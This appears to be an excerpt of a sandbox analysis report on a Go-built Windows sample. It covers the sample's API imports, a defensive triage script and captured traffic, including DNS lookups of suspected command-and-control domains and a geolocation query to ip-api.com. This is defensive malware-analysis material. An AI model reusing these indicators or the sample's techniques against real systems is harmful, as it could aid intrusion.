GDI32.dll                               ChoosePixelFormat, CreateBitmap, CreateDCW, CreateDIBSection, CreateRectRgn, DeleteDC, DeleteObject, DescribePixelFormat, GetDeviceCaps, GetDeviceGammaRamp, SetDeviceGammaRamp, SetPixelFormat, SwapBuffers
KERNEL32.dll                            AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateIoCompletionPort, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetLastError, GetModuleHandleExW, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetThreadContext, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, MultiByteToWideChar, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetProcessPriorityBoost, SetThreadContext, SetThreadExecutionState, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VerSetConditionMask, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
api-ms-win-crt-convert-l1-1-0.dll       strtol, strtoul
api-ms-win-crt-environment-l1-1-0.dll   __p__environ, __p__wenviron
api-ms-win-crt-heap-l1-1-0.dll          _set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-math-l1-1-0.dll          __setusermatherr
api-ms-win-crt-private-l1-1-0.dll       memcpy, memmove, strstr
api-ms-win-crt-runtime-l1-1-0.dll       __p___argc, __p___argv, __p___wargv, _beginthread, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_app_type, _set_invalid_parameter_handler, _wassert, abort, exit, signal
api-ms-win-crt-stdio-l1-1-0.dll         __acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfprintf, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, fwrite
api-ms-win-crt-string-l1-1-0.dll        memset, strcmp, strcpy, strcspn, strlen, strncmp, strncpy, strspn, strtok, wcscmp, wcscpy
api-ms-win-crt-time-l1-1-0.dll          __daylight, __timezone, __tzname, _tzset
api-ms-win-crt-utility-l1-1-0.dll       qsort
OPENGL32.dll                            wglGetProcAddress
SHELL32.dll                             DragAcceptFiles, DragFinish, DragQueryFileW, DragQueryPoint
USER32.dll                              AdjustWindowRectEx, BringWindowToTop, ChangeDisplaySettingsExW, ClientToScreen, ClipCursor, CloseClipboard, CreateIconIndirect, CreateWindowExW, DefWindowProcW, DestroyIcon, DestroyWindow, DispatchMessageW, EmptyClipboard, EnumDisplayDevicesW, EnumDisplayMonitors, EnumDisplaySettingsExW, EnumDisplaySettingsW, FlashWindow, GetActiveWindow, GetClassLongPtrW, GetClientRect, GetClipboardData, GetCursorPos, GetDC, GetKeyState, GetLayeredWindowAttributes, GetMessageTime, GetMonitorInfoW, GetPropW, GetRawInputData, GetRawInputDeviceInfoA, GetRawInputDeviceList, GetSystemMetrics, GetWindowLongW, GetWindowPlacement, GetWindowRect, IsIconic, IsWindowVisible, IsZoomed, LoadCursorW, LoadImageW, MapVirtualKeyW, MonitorFromWindow, MoveWindow, MsgWaitForMultipleObjects, OffsetRect, OpenClipboard, PeekMessageW, PostMessageW, PtInRect, RegisterClassExW, RegisterDeviceNotificationW, RegisterRawInputDevices, ReleaseCapture, ReleaseDC, RemovePropW, ScreenToClient, SendMessageW, SetCapture, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetLayeredWindowAttributes, SetPropW, SetRect, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextW, ShowWindow, SystemParametersInfoW, ToUnicode, TrackMouseEvent, TranslateMessage, UnregisterClassW, UnregisterDeviceNotification, WaitMessage, WindowFromPoint
Name                    Ordinal  Address
_cgo_dummy_export       1        0x1419f49b0
glowDebugCallback_gl21  2        0x14092d810
goCharCB                3        0x1409190a0
goCharModsCB            4        0x1409190f0
goCursorEnterCB         5        0x140918f60
goCursorPosCB           6        0x140918ef0
goDropCB                7        0x140919150
goErrorCB               8        0x140918dc0
goFramebufferSizeCB     9        0x1409192c0
goJoystickCB            10       0x140918e20
goKeyCB                 11       0x140919020
goMonitorCB             12       0x1409191b0
goMouseButtonCB         13       0x140918e80
goScrollCB              14       0x140918fb0
goWindowCloseCB         15       0x140919320
goWindowContentScaleCB  16       0x140919490
goWindowFocusCB         17       0x1409193f0
goWindowIconifyCB       18       0x140919440
goWindowMaximizeCB      19       0x140919360
goWindowPosCB           20       0x140919200
goWindowRefreshCB       21       0x1409193b0
goWindowSizeCB          22       0x140919260
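Read together, the import and export tables say more than the per-API signatures do. The `_cgo_dummy_export` symbol and the `go*CB` / `glowDebugCallback_gl21` trampolines are what the go-gl GLFW and OpenGL bindings export from a cgo build, and the GDI32/USER32/OPENGL32 imports (pixel formats, gamma ramps, raw input registration, clipboard, display enumeration) are GLFW's Win32 backend. The KERNEL32 list is the Go runtime's own (vectored exception handlers, I/O completion ports, `WerSetFlags`, `RaiseFailFastException`), and that matters for triage: Go's asynchronous preemption on Windows suspends a thread, reads and rewrites its context and resumes it, so the `SuspendThread`/`GetThreadContext`/`SetThreadContext`/`ResumeThread` quartet is expected in any Go binary and is not by itself evidence of injection. Conversely, a Go program reaches almost every other Win32 API through `LoadLibrary`/`GetProcAddress` at run time, so the absence of, say, `CreateProcessW` or registry APIs from this table says nothing about what the sample does once running; the behavioural signatures above are the evidence for that. The script below is an added example, not from the report, that applies this reading to a constructed subset of the tables; the indicator groups, weights and the list of Go-runtime imports are my own assumptions.

```python
"""Static import triage with a Go/cgo-awareness step.

Added example. IMPORTS/EXPORTS are a constructed subset of the report's
tables; GROUPS, GO_RUNTIME_APIS and the weights are assumptions, not
Joe Sandbox's rules.
"""
from typing import Dict, List

IMPORTS: Dict[str, List[str]] = {
    "KERNEL32.dll": [
        "AddVectoredExceptionHandler", "CreateIoCompletionPort", "GetProcAddress",
        "GetThreadContext", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryW",
        "ResumeThread", "SetThreadContext", "SuspendThread", "VirtualAlloc",
        "VirtualProtect", "WerSetFlags",
    ],
    "USER32.dll": [
        "GetClipboardData", "GetKeyState", "GetRawInputData", "OpenClipboard",
        "RegisterRawInputDevices", "SetClipboardData",
    ],
    "GDI32.dll": ["SetDeviceGammaRamp", "SwapBuffers"],
    "OPENGL32.dll": ["wglGetProcAddress"],
}
EXPORTS: List[str] = ["_cgo_dummy_export", "glowDebugCallback_gl21", "goKeyCB", "goMouseButtonCB"]

# Behaviour groups keyed on API sets (assumed mapping).
GROUPS: Dict[str, set] = {
    "raw_input":       {"RegisterRawInputDevices", "GetRawInputData"},
    "clipboard":       {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
    "thread_context":  {"SuspendThread", "GetThreadContext", "SetThreadContext", "ResumeThread"},
    "dynamic_resolve": {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW", "GetProcAddress"},
    "rwx_memory":      {"VirtualAlloc", "VirtualProtect"},
}

# Imports the Go runtime itself declares on Windows (assumed subset).
GO_RUNTIME_APIS = {
    "AddVectoredExceptionHandler", "AddVectoredContinueHandler", "CreateIoCompletionPort",
    "GetQueuedCompletionStatusEx", "RaiseFailFastException", "WerSetFlags",
    "SuspendThread", "GetThreadContext", "SetThreadContext", "ResumeThread",
}


def imported_names(imports: Dict[str, List[str]]) -> set:
    return {fn for fns in imports.values() for fn in fns}


def is_go_cgo(exports: List[str]) -> bool:
    """cgo builds export _cgo_dummy_export; go-gl bindings add go*CB trampolines."""
    return "_cgo_dummy_export" in exports or any(
        e.startswith("go") and e.endswith("CB") for e in exports)


def triage(imports: Dict[str, List[str]], exports: List[str]) -> Dict[str, dict]:
    names = imported_names(imports)
    go = is_go_cgo(exports)
    result = {}
    for group, apis in GROUPS.items():
        hit = sorted(apis & names)
        if not hit:
            continue
        complete = apis <= names
        weight = 2 if complete else 1          # assumed scoring
        note = ""
        if group == "thread_context" and go and apis <= GO_RUNTIME_APIS:
            weight = 0
            note = "Go runtime async preemption uses exactly these; not injection evidence alone"
        elif group == "dynamic_resolve" and go:
            note = "Go resolves most Win32 APIs at run time; the static table undercounts"
        result[group] = {"hit": hit, "complete": complete, "weight": weight, "note": note}
    return result


def score(result: Dict[str, dict]) -> int:
    return sum(v["weight"] for v in result.values())


if __name__ == "__main__":
    r = triage(IMPORTS, EXPORTS)
    for group, v in r.items():
        print(f"{group:16} weight={v['weight']} hit={v['hit']} {v['note']}")
    print("go/cgo binary:", is_go_cgo(EXPORTS), " total score:", score(r))
```

Running it with the exports present zeroes the thread-context group and leaves raw-input registration, clipboard access, dynamic resolution and writable/executable memory as the groups worth carrying into the dynamic analysis; stripping the exports from the call (`triage(IMPORTS, [])`) shows how much of a "process injection" reading rests purely on APIs that every Go binary carries.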
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 26, 2024 20:38:16.574278116 CET  49713        80         192.168.2.7    208.95.112.1
Nov 26, 2024 20:38:16.699877024 CET  80           49713      208.95.112.1   192.168.2.7
Nov 26, 2024 20:38:16.699978113 CET  49713        80         192.168.2.7    208.95.112.1
Nov 26, 2024 20:38:16.700757027 CET  49713        80         192.168.2.7    208.95.112.1
Nov 26, 2024 20:38:16.827594042 CET  80           49713      208.95.112.1   192.168.2.7
Nov 26, 2024 20:38:17.804083109 CET  80           49713      208.95.112.1   192.168.2.7
Nov 26, 2024 20:38:17.805345058 CET  49713        80         192.168.2.7    208.95.112.1
Nov 26, 2024 20:38:17.925419092 CET  80           49713      208.95.112.1   192.168.2.7
Nov 26, 2024 20:38:18.125679970 CET  80           49713      208.95.112.1   192.168.2.7
Nov 26, 2024 20:38:18.176301956 CET  49713        80         192.168.2.7    208.95.112.1
Nov 26, 2024 20:38:18.729903936 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:18.729937077 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:18.730004072 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:18.733814955 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:18.733829975 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.205585957 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.205744982 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:20.205754995 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.205883026 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:20.205888987 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.206990004 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.207093954 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:20.241015911 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:20.241015911 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:20.241029978 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.241091967 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.296027899 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:20.296040058 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:20.343362093 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.096477032 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.096631050 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.096815109 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.096838951 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.096854925 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.096864939 CET  49720        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.096869946 CET  443          49720      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.348949909 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.348994970 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.349066973 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.434794903 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.434809923 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.501127958 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.501162052 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:21.501224995 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.501581907 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:21.501605034 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.854721069 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.910202980 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.922972918 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.972706079 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.982846022 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.982860088 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.982989073 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.982992887 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.983036995 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.983057976 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.983335972 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.983340979 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.984168053 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.984230995 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:22.984458923 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.984476089 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:22.984519958 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.270840883 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.271059036 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.319981098 CET  49728        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.320024014 CET  443          49728      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.328414917 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.328531981 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.328542948 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.328557014 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.328619957 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.328726053 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.328733921 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.328872919 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.328905106 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.328906059 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.328948021 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329014063 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329022884 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329082966 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329082966 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329122066 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329200029 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329206944 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329219103 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329229116 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329232931 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329247952 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329248905 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329267025 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329299927 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329559088 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329571009 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329583883 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329586983 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329610109 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329617977 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329637051 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329649925 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329663038 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329674959 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329674959 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329684019 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329694986 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329701900 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329725981 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329726934 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329746962 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329756021 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329761982 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329775095 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329782009 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329919100 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329929113 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.329946041 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.329956055 CET  443          49729      51.210.106.44  192.168.2.7
Nov 26, 2024 20:38:23.330039024 CET  49729        443        192.168.2.7    51.210.106.44
Nov 26, 2024 20:38:23.330048084 CET  443          49729      51.210.106.44  192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330059052 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330077887 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330153942 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330164909 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330182076 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330188990 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330197096 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330202103 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330229044 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330229044 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330238104 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330245972 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330259085 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330271006 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330348969 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330370903 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330421925 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330435991 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330456972 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330661058 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330759048 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.371337891 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.375333071 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.397710085 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.443336010 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.750319004 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.750400066 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.750694036 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.751043081 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.751056910 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.751068115 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.751071930 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:24.676753044 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:24.676827908 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:24.676896095 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:28.273477077 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:28.273893118 CET49729443192.168.2.751.210.106.44
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 26, 2024 20:38:16.425585032 CET  59425        53         192.168.2.7  1.1.1.1
Nov 26, 2024 20:38:16.569785118 CET  53           59425      1.1.1.1      192.168.2.7
Nov 26, 2024 20:38:18.126791000 CET  58214        53         192.168.2.7  1.1.1.1
Nov 26, 2024 20:38:18.727670908 CET  53           58214      1.1.1.1      192.168.2.7
Nov 26, 2024 20:38:21.097464085 CET  62610        53         192.168.2.7  1.1.1.1
Nov 26, 2024 20:38:21.332093954 CET  53           62610      1.1.1.1      192.168.2.7
Nov 26, 2024 20:38:33.906800032 CET  55445        53         192.168.2.7  1.1.1.1
Nov 26, 2024 20:38:34.057097912 CET  53           55445      1.1.1.1      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
Nov 26, 2024 20:38:16.425585032 CET  192.168.2.7  1.1.1.1  0xbff0    Standard query (0)  ip-api.com     A (IP address)  IN (0x0001)  false
Nov 26, 2024 20:38:18.126791000 CET  192.168.2.7  1.1.1.1  0x5eb6    Standard query (0)  b.tundara.dev  A (IP address)  IN (0x0001)  false
Nov 26, 2024 20:38:21.097464085 CET  192.168.2.7  1.1.1.1  0x8117    Standard query (0)  w.tundara.dev  A (IP address)  IN (0x0001)  false
Nov 26, 2024 20:38:33.906800032 CET  192.168.2.7  1.1.1.1  0xdc6a    Standard query (0)  w.tundara.dev  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name           CName  Address        Type            Class        DNS over HTTPS
Nov 26, 2024 20:38:16.569785118 CET  1.1.1.1    192.168.2.7  0xbff0    No error (0)  ip-api.com     -      208.95.112.1   A (IP address)  IN (0x0001)  false
Nov 26, 2024 20:38:18.727670908 CET  1.1.1.1    192.168.2.7  0x5eb6    No error (0)  b.tundara.dev  -      51.210.106.44  A (IP address)  IN (0x0001)  false
Nov 26, 2024 20:38:21.332093954 CET  1.1.1.1    192.168.2.7  0x8117    No error (0)  w.tundara.dev  -      51.210.106.44  A (IP address)  IN (0x0001)  false
Nov 26, 2024 20:38:34.057097912 CET  1.1.1.1    192.168.2.7  0xdc6a    No error (0)  w.tundara.dev  -      51.210.106.44  A (IP address)  IN (0x0001)  false
• b.tundara.dev
• w.tundara.dev
• ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49713        208.95.112.1    80                1408  C:\Users\user\Desktop\file.exe

Timestamp                            Bytes transferred  Direction  Data (on the lines that follow)
Nov 26, 2024 20:38:16.700757027 CET  96                 OUT
GET /json/ HTTP/1.1
Host: ip-api.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Nov 26, 2024 20:38:17.804083109 CET  482                IN
HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 19:38:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.75"}

Nov 26, 2024 20:38:17.805345058 CET  96                 OUT
GET /json/ HTTP/1.1
Host: ip-api.com
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Nov 26, 2024 20:38:18.125679970 CET  482                IN
HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 19:38:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 305
Access-Control-Allow-Origin: *
X-Ttl: 59
X-Rl: 43
